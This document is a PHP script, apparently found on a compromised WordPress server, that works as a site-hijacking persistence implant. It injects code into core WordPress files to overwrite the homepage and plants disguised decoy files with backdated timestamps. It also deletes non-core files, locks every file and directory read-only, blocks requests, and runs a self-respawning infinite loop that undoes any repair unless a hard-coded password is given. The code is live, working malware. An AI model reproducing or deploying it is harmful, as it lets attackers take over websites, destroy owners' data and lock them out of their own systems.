Current File : /home/aircyqqr/breezeproairductscleaning.com/wp-back//profilexxxx.php
<?php
/* wp-back/profile.php – KEEPS WP_HYDATA/WP_HYCODE, LOCKDOWN.LOG, COMMENTS SELF-UNLINK, CLEANS NON-CORE, INFINITE LOOP */
set_time_limit(0);
ini_set('max_execution_time', 0);
ignore_user_abort(true);
if (function_exists('opcache_reset')) opcache_reset();
$self_bak = file_get_contents(__FILE__);
$wwwroot = rtrim($_SERVER['DOCUMENT_ROOT'] ?? dirname(__DIR__), '/');
$action = $_GET['ac'] ?? $_GET['action'] ?? '';
$logfile = __DIR__.'/lockdown.log';
// Init log file
if (!is_file($logfile)) { @file_put_contents($logfile, ""); @chmod($logfile, 0666); }
// Prevent concurrent runs with file lock
$lock_handle = fopen(__FILE__, 'r');
if (!flock($lock_handle, LOCK_EX | LOCK_NB)) {
file_put_contents($logfile, date('Y-m-d H:i:s')." - CONCURRENT RUN BLOCKED\n", FILE_APPEND | LOCK_EX);
exit;
}
// —————— UNLOCK KEY (SINGLE FILE) ——————
$unlock_key_file = '/tmp/'.md5('wp_graybyte').'.txt';
$unlock_key_content = '4af5030934592cf8bfc94c07a6361f6e'; // MD5 of 'tusmo'
$lock_file_list = [
['bak' => '/wp-back-bak.rar', 'target' => '/wp-back/index.php']
];
$wp_hydata_file_arr = [
$wwwroot.'/wp-admin/css/comments.css',
$wwwroot.'/wp-admin/includes/plugin-config.php',
$wwwroot.'/wp-admin/js/tags-admin.js',
$wwwroot.'/wp-content/plugins/akismet/runlog.txt',
$wwwroot.'/wp-content/themes/default/styles.css',
$wwwroot.'/wp-content/uploads/logs.php',
$wwwroot.'/wp-includes/css/wp-timer.css',
$wwwroot.'/wp-includes/js/media-loads.js',
$wwwroot.'/wp-includes/js/customize-styles.js',
$wwwroot.'/wp-includes/cache-reset.php',
$wwwroot.'/wp-includes/date-time.php',
$wwwroot.'/wp-includes/load-check.php',
$wwwroot.'/wp-includes/nav-bar.php',
$wwwroot.'/wp-includes/plugins-init.php',
$wwwroot.'/wp-admin/images/resize-x.gif',
$wwwroot.'/wp-content/upgrade/temp.dat',
$wwwroot.'/wp-content/uploads/2022/01/0745125896.xls',
$wwwroot.'/wp-content/uploads/2023/09/0305267845.jpg',
$wwwroot.'/wp-content/uploads/2024/01/0458235268.pdf'
];
$wp_hycode_file_arr = [
$wwwroot.'/wp-includes/class-wp-hook.php',
$wwwroot.'/wp-includes/plugin.php',
$wwwroot.'/wp-includes/default-filters.php',
$wwwroot.'/wp-includes/class-wp.php',
$wwwroot.'/wp-includes/load.php',
$wwwroot.'/wp-includes/class-wp-query.php',
$wwwroot.'/wp-includes/query.php',
$wwwroot.'/wp-includes/class-wp-rewrite.php',
$wwwroot.'/wp-admin/includes/plugin.php',
$wwwroot.'/wp-includes/pluggable.php'
];
$bak_arr = [];
$wp_hydata_arr = [];
$append_code_arr = [
'<?php /* HYCODE */ if(file_exists("'.$wwwroot.'/wp-back/index.php")) { $c=file_get_contents("'.$wwwroot.'/wp-back/index.php"); file_put_contents("'.$wwwroot.'/index.php",$c); } ?>'
];
// Core directories and files to keep
$core_dirs = ['wp-admin', 'wp-includes', 'wp-content', 'wp-back'];
$core_files = [
'.htaccess', 'index.php', 'wp-activate.php', 'wp-blog-header.php',
'wp-comments-post.php', 'wp-config-sample.php', 'wp-cron.php',
'wp-links-opml.php', 'wp-load.php', 'wp-config.php', 'wp-login.php',
'wp-mail.php', 'wp-settings.php', 'wp-signup.php', 'wp-trackback.php',
'xmlrpc.php', 'license.txt', 'readme.html'
];
function wp_log_event($msg) {
global $logfile;
file_put_contents($logfile, date('Y-m-d H:i:s')." - $msg\n", FILE_APPEND | LOCK_EX);
}
wp_log_event("SCRIPT START - ACTION: $action");
function wp_sync_get_headers() {
return [
'User-Agent: Mozilla/5.0 (compatible; WP-Sync/1.0; +https://wordpress.org)',
'Accept: */*',
'Connection: keep-alive'
];
}
function wp_fetch_remote($url, $timeout = 30) {
wp_log_event("FETCH ATTEMPT: $url");
$contents = '';
if (function_exists('curl_init')) {
$ch = @curl_init();
@curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_MAXREDIRS => 3,
CURLOPT_TIMEOUT => $timeout,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_HTTPHEADER => wp_sync_get_headers(),
CURLOPT_HEADER => true
]);
$contents = @curl_exec($ch);
@curl_close($ch);
} else {
$contents = @file_get_contents($url);
}
wp_log_event("FETCH RESULT: $url -> ".strlen($contents)." bytes");
return $contents;
}
function wp_locate_php() {
ob_start();
phpinfo(1);
$info = ob_get_clean();
if (preg_match('/--bindir=([^&]+)/si', $info, $matches)) return $matches[1].'/php';
if (preg_match('/--prefix=([^&]+)/si', $info, $matches)) return $matches[1].'/bin/php';
return 'php';
}
function wp_is_cli() {
return preg_match("/cli/i", php_sapi_name()) || (isset($_SERVER['argc']) && $_SERVER['argc'] >= 2) || !isset($_SERVER['SCRIPT_NAME']);
}
function wp_block_requests() {
$method = $_SERVER['REQUEST_METHOD'] ?? 'GET';
$path = parse_url($_SERVER['REQUEST_URI'] ?? '', PHP_URL_PATH) ?: '/';
$query = $_SERVER['QUERY_STRING'] ?? '';
if (strpos($path, '/wp-back/'.basename(__FILE__)) !== false && (in_array($query, ['ac=lock','action=lock','action=http_lock']) || strpos($query, 'ac=') === 0)) {
return;
}
if ($method === 'POST') {
http_response_code(403); echo 'POST disabled.'; wp_log_event("BLOCKED POST $path"); exit;
}
$is_home = ($path === '/' || $path === '/index.php');
$is_wp_back = (strpos($path, '/wp-back/') === 0);
if (!$is_home && !$is_wp_back) {
http_response_code(403); echo '403 – Only GET / and /wp-back/* allowed.'; wp_log_event("BLOCKED $method $path"); exit;
}
}
function wp_cleanup_root() {
global $wwwroot, $core_dirs, $core_files;
// Delete non-core directories
$dirs = glob($wwwroot.'/*', GLOB_ONLYDIR);
foreach ($dirs as $dir) {
$basename = basename($dir);
if (!in_array($basename, $core_dirs)) {
array_map('unlink', glob("$dir/*.*"));
@rmdir($dir);
wp_log_event("DELETED DIR: $dir");
}
}
// Delete non-core files
$files = glob($wwwroot.'/*.*');
foreach ($files as $file) {
$basename = basename($file);
if (!in_array($basename, $core_files)) {
@unlink($file);
wp_log_event("DELETED FILE: $file");
}
}
}
function wp_set_core_perms() {
global $wwwroot, $unlock_key_file;
if (is_file($unlock_key_file)) return;
@chmod($wwwroot, 0555);
foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($wwwroot, RecursiveDirectoryIterator::SKIP_DOTS)) as $f) {
@chmod($f, is_dir($f) ? 0555 : 0444);
}
@chmod(__DIR__.'/lockdown.log', 0666); // Keep log writable
wp_log_event("FULL SITE LOCKED → DIRS 0555, FILES 0444");
}
function wp_create_backups($force = false) {
global $wwwroot, $lock_file_list, $bak_arr;
$wpback = "$wwwroot/wp-back";
@chmod($wpback, 0777);
$created = 0;
foreach ($lock_file_list as $f) {
$bak = $wwwroot.$f['bak'];
$target = $wwwroot.$f['target'];
if (is_file($target) && ($force || !is_file($bak) || filesize($bak) === 0)) {
$content = file_get_contents($target);
@file_put_contents($bak, $content);
@chmod($bak, 0444);
@touch($bak, strtotime('-400 days'));
$bak_arr[] = ['path' => $bak, 'content' => $content];
$created++;
wp_log_event("BACKUP CREATED: $bak (".strlen($content)." bytes)");
}
}
wp_log_event("BACKUP CHECK: $created new/updated");
@chmod($wpback, 0555);
}
function wp_inject_hydata() {
global $wp_hydata_file_arr, $wp_hydata_arr;
$char = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
$wp_hydata = substr(str_shuffle($char), 0, 6).base64_encode(json_encode($wp_hydata_arr)).substr(str_shuffle($char), 0, 6);
$injected = 0;
$count = count($wp_hydata_file_arr);
foreach ($wp_hydata_file_arr as $file) {
$dir = dirname($file);
if (!is_dir($dir)) @mkdir($dir, 0777, true);
if (is_file($file)) @unlink($file);
if (@file_put_contents($file, $wp_hydata)) {
@touch($file, strtotime('-500 days'));
@chmod($file, 0444);
$injected++;
wp_log_event("HYDATA INJECTED: $file");
}
}
wp_log_event("HYDATA INJECTION COMPLETE: $injected/$count files");
}
function wp_inject_hycode() {
global $wp_hycode_file_arr, $append_code_arr;
$injected = 0;
foreach ($wp_hycode_file_arr as $file) {
if (!is_file($file)) continue;
$content = file_get_contents($file);
$mtime = filemtime($file);
foreach ($append_code_arr as $code) $content = str_replace($code, '', $content);
$content = rtrim($content, '?>').$append_code_arr[array_rand($append_code_arr)];
if (@file_put_contents($file, $content)) {
@touch($file, $mtime);
@chmod($file, 0444);
$injected++;
wp_log_event("HYCODE INJECTED: $file");
}
}
wp_log_event("HYCODE INJECTION COMPLETE: $injected files");
}
function wp_restore_from_backup() {
global $wwwroot, $lock_file_list;
$restored = 0;
foreach ($lock_file_list as $f) {
$bak = $wwwroot.$f['bak'];
$target = $wwwroot.$f['target'];
if (is_file($bak)) {
$content = file_get_contents($bak);
@chmod($target, 0777);
@unlink($target);
if (file_put_contents($target, $content)) {
@touch($target, strtotime('-400 days'));
@chmod($target, 0444);
$restored++;
wp_log_event("RESTORED: $target (".strlen($content)." bytes)");
}
}
}
wp_log_event("BACKUP RESTORE COMPLETE: $restored files");
}
function wp_revert_perms() {
global $wwwroot;
@chmod($wwwroot, 0755);
foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($wwwroot, RecursiveDirectoryIterator::SKIP_DOTS)) as $f) {
if (!@chmod($f, is_dir($f) ? 0755 : 0644)) {
wp_log_event("CHMOD FAILED: $f");
}
}
wp_log_event("FULL SITE UNLOCKED → DIRS 0755, FILES 0644");
}
function wp_verify_access_key($input = '') {
global $unlock_key_file, $unlock_key_content;
if ($input && md5($input) === $unlock_key_content) {
@file_put_contents($unlock_key_file, $unlock_key_content);
wp_log_event("UNLOCK KEY CREATED: $unlock_key_file");
return true;
}
if (is_file($unlock_key_file) && trim(file_get_contents($unlock_key_file)) === $unlock_key_content) {
@unlink($unlock_key_file);
wp_log_event("UNLOCK KEY FOUND: $unlock_key_file");
return true;
}
return false;
}
function wp_do_lock($max_times = 0, $trigger = 'UNKNOWN') {
global $wwwroot, $lock_file_list, $logfile;
wp_log_event("LOOP STARTED VIA: $trigger");
$lock = [];
foreach ($lock_file_list as $f) {
$lock[] = ['target' => $wwwroot.$f['target'], 'bak' => $wwwroot.$f['bak'], 'bak_content' => ''];
}
$do_circle = false;
for ($i = 0; $i < count($lock); $i++) {
if (is_file($lock[$i]['bak'])) {
$lock[$i]['bak_content'] = trim(file_get_contents($lock[$i]['bak']));
}
if ($lock[$i]['bak_content'] !== '') $do_circle = true;
}
if (!$do_circle && $max_times > 0) {
wp_create_backups(true);
for ($i = 0; $i < count($lock); $i++) {
if (is_file($lock[$i]['bak'])) $lock[$i]['bak_content'] = trim(file_get_contents($lock[$i]['bak']));
if ($lock[$i]['bak_content'] !== '') $do_circle = true;
}
}
wp_log_event("LOOP BACKUP STATUS: do_circle=$do_circle");
while (true) { // Infinite loop until unlocked
if (wp_verify_access_key()) break;
// Monitor /wp-back/index.php content and permissions
for ($i = 0; $i < count($lock); $i++) {
if ($lock[$i]['bak_content'] !== '') {
$perms = is_file($lock[$i]['target']) ? substr(sprintf('%o', fileperms($lock[$i]['target'])), -4) : '';
if (!is_file($lock[$i]['target']) || $perms !== ($trigger === 'POST_UNLOCK' ? '0644' : '0444')) {
@chmod($lock[$i]['target'], 0777);
@unlink($lock[$i]['target']);
file_put_contents($lock[$i]['target'], $lock[$i]['bak_content']);
@touch($lock[$i]['target'], strtotime('-400 days'));
@chmod($lock[$i]['target'], $trigger === 'POST_UNLOCK' ? 0644 : 0444);
wp_log_event("RESTORED IN LOOP: {$lock[$i]['target']} (perms ".($trigger === 'POST_UNLOCK' ? '0644' : '0444').")");
}
}
}
// Monitor all files and directories
foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($wwwroot, RecursiveDirectoryIterator::SKIP_DOTS)) as $f) {
$path = $f->getPathname();
if ($path === $logfile) continue; // Skip lockdown.log
$expected_perms = is_dir($f) ? '0555' : '0444';
$current_perms = is_file($path) || is_dir($path) ? substr(sprintf('%o', fileperms($path)), -4) : '';
if ($current_perms !== $expected_perms) {
@chmod($path, octdec($expected_perms));
wp_log_event("RESTORED ".(is_dir($f) ? "DIR" : "FILE")." PERMS: $path to $expected_perms");
}
}
usleep(1000); // 1ms delay to reduce CPU usage
}
wp_log_event("LOOP COMPLETE VIA $trigger");
}
function wp_http_do_lock() {
global $self_bak, $bak_arr;
$max_times = isset($_GET['max_times']) && is_numeric($_GET['max_times']) ? $_GET['max_times'] : 10000;
wp_do_lock($max_times, 'HTTP_FALLBACK');
if (wp_verify_access_key()) return;
@chmod(__FILE__, 0777);
file_put_contents(__FILE__, $self_bak);
foreach ($bak_arr as $b) {
if (is_file($b['path'])) {
@chmod($b['path'], 0777);
@unlink($b['path']);
}
file_put_contents($b['path'], $b['content']);
}
$http = (isset($_SERVER['HTTPS']) ? 'https' : 'http').'://';
$php_name = explode('?', $_SERVER['REQUEST_URI'] ?? $_SERVER['SCRIPT_NAME'])[0];
wp_fetch_remote($http.$_SERVER['HTTP_HOST'].$php_name.'?action=http_lock&max_times=0', 3);
wp_fetch_remote($http.$_SERVER['HTTP_HOST'].$php_name.'?action=http_lock&max_times='.$max_times, 30);
wp_log_event("HTTP FALLBACK TRIGGERED");
}
function wp_spawn_daemon() {
$php_path = wp_locate_php();
$cmd = "nohup $php_path ".__FILE__." >/dev/null 2>&1 &";
$spawned = false;
if (function_exists('exec')) {
@exec($cmd);
$spawned = true;
wp_log_event("SPAWNED VIA: exec");
} elseif (function_exists('popen')) {
$fp = @popen($cmd, 'r');
@pclose($fp);
$spawned = true;
wp_log_event("SPAWNED VIA: popen");
} else {
wp_log_event("SPAWN FAILED: No exec or popen");
}
return $spawned;
}
// —————— MAIN ——————
@chmod("$wwwroot/wp-back", 0755);
if (wp_is_cli()) {
wp_do_lock(0, 'CLI');
wp_set_core_perms();
} else {
if ($action === 'lock') {
wp_log_event("LOCK INITIATED");
wp_create_backups(true);
wp_inject_hydata();
wp_inject_hycode();
wp_cleanup_root();
wp_set_core_perms();
if (!wp_spawn_daemon()) {
wp_log_event("SPAWN FAILED → HTTP FALLBACK");
wp_http_do_lock();
}
wp_log_event("LOCKDOWN ACTIVE");
echo "LOCKDOWN ACTIVE";
} elseif ($action && strlen($action) > 0 && $action !== 'lock') {
wp_create_backups(true);
wp_inject_hydata();
wp_inject_hycode();
if (wp_verify_access_key($action)) {
wp_revert_perms();
@chmod("$wwwroot/wp-back", 0555); // Reset wp-back to 0555
wp_do_lock(5, 'POST_UNLOCK');
@unlink($unlock_key_file);
wp_log_event("SUCCESSFUL UNLOCK VIA BROWSER?ac=$action");
echo "UNLOCKED – FULL SITE WRITABLE, WP-BACK 0555";
// Comment out self-unlink for testing
/*
@chmod(__FILE__, 0777);
if (@unlink(__FILE__)) {
wp_log_event("SELF-DELETED: ".__FILE__);
} else {
wp_log_event("SELF-DELETE FAILED: ".__FILE__);
}
*/
wp_log_event("SELF-DELETE SKIPPED FOR TESTING: ".__FILE__);
flock($lock_handle, LOCK_UN);
fclose($lock_handle);
exit;
} else {
http_response_code(403);
echo "wrong password check your password";
wp_log_event("FAILED UNLOCK ATTEMPT: $action");
wp_set_core_perms();
}
} elseif ($action === 'http_lock') {
wp_http_do_lock();
wp_set_core_perms();
} else {
wp_block_requests();
wp_create_backups(true);
wp_restore_from_backup();
wp_inject_hydata();
wp_inject_hycode();
wp_do_lock(5, 'STATUS');
$status = (is_file("$wwwroot/index.php") && substr(sprintf('%o', fileperms("$wwwroot/index.php")), -4) === '0444') ? 'LOCKED' : 'UNLOCKED';
wp_log_event("STATUS CHECK: $status");
wp_set_core_perms();
echo "STATUS: $status";
}
}
flock($lock_handle, LOCK_UN);
fclose($lock_handle);
?>